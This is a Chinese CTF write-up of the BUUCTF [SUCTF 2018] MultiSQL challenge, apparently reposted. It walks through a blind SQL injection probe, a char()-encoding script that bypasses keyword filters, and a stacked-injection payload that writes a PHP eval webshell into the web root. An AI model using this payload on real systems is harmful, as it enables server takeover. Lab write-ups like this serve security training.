![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/03/5-1648458525.gif "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/03/8-1648458527.png "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
两个地方存在漏洞,注册存在二次注入,在登录的时候触发。用户信息?id存在盲注,flag不在数据库当中,需要利用注入getshell
二次注入我没有成功getshell,先看?id,注册一个用户,登入查看信息
![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/03/8-1648458529.png "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
?id=2^(if(ascii(mid(user(),1,1))>0,0,1))判断存在注入,2异或0还是为2
![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/03/5-1648458531.png "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/03/5-1648458533.png "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
fuzz测试后发现过滤了union,select ,&,|,过滤了select然后存在堆叠注入的可以使用预处理注入,尝试写入shell,因为过滤了select等字符,使用char()绕过,需要执行的语句
select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';
使用脚本编程十进制:
str="select '<?php eval($_POST[_]);?>' into outfile '/var/www/html/favicon/shell.php';"len_str=len(str)for i in range(0,len_str):if i == 0:print('char(%s'%ord(str[i]),end="")else:print(',%s'%ord(str[i]),end="")print(')')
运行结果
char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59)
payload:
?id=2;set @sql=char(115,101,108,101,99,116,32,39,60,63,112,104,112,32,101,118,97,108,40,36,95,80,79,83,84,91,95,93,41,59,63,62,39,32,105,110,116,111,32,111,117,116,102,105,108,101,32,39,47,118,97,114,47,119,119,119,47,104,116,109,108,47,102,97,118,105,99,111,110,47,115,104,101,108,108,46,112,104,112,39,59);prepare query from @sql;execute query;
![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/03/10-1648458535.png "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
http://71730bda-76d9-4979-ab53-0d0ba83dffdc.node3.buuoj.cn/favicon/shell.php查看shell
![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/03/9-1648458537.png "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
原文来自CSDN博主「末 初」|侵删
![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/03/6-1648458539.png "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/03/10-1648458540.png "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](https://cn-sec.com/wp-content/uploads/2022/03/3-1648458542.png "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](https://cn-sec.com/wp-content/uploads/2022/03/1-1648458544.png "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
。想加入我们就给我们留言吧![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/03/2-1648458545.png "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
。![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/03/1-1648458546.gif "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/03/8-1648458549.gif "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
![BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解](http://cn-sec.com/wp-content/uploads/2022/03/0-1648458550.png "BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解")
原文始发于微信公众号(寰宇卫士):BUUCTF:[SUCTF 2018]MultiSQL解题步骤详解
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论